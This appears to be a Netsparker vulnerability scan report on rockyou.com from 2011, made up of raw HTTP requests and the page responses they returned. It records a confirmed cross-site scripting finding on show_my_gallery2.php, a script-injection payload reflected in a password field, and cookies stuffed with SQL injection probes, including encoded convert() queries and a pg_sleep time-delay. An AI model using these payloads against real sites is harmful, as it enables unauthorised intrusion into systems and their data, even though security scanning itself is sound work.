value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914"&..
Date: Mon, 18 Apr 2011 22:38:48 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:38:48 GMT; path=/; domain=.rockyou.com,lastlogin=1303166328; expires=Wed, 27-Jul-2011 22:38:48 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:38:48 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:38:48 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:38:48 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=91568 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9097
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\"></script><script>netsparker(9)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914"&..
|
- /show_my_gallery2.php
/show_my_gallery2.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| instanceid | GET | expression(alert(9)) |
| action | GET | rate |
Request
GET /show_my_gallery2.php?instanceid=expression(netsparker(9))&action=rate HTTP/1.1
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=&action=rate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166409; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=&action=rate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166409; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:40:14 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:40:13 GMT; path=/; domain=.rockyou.com,lastlogin=1303166414; expires=Wed, 27-Jul-2011 22:40:14 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:40:14 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:40:14 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:40:14 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=255942 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9796
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid=expression(netsparker(9))"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=expression(netsparker(9))", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=expression(netsparker(9))&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
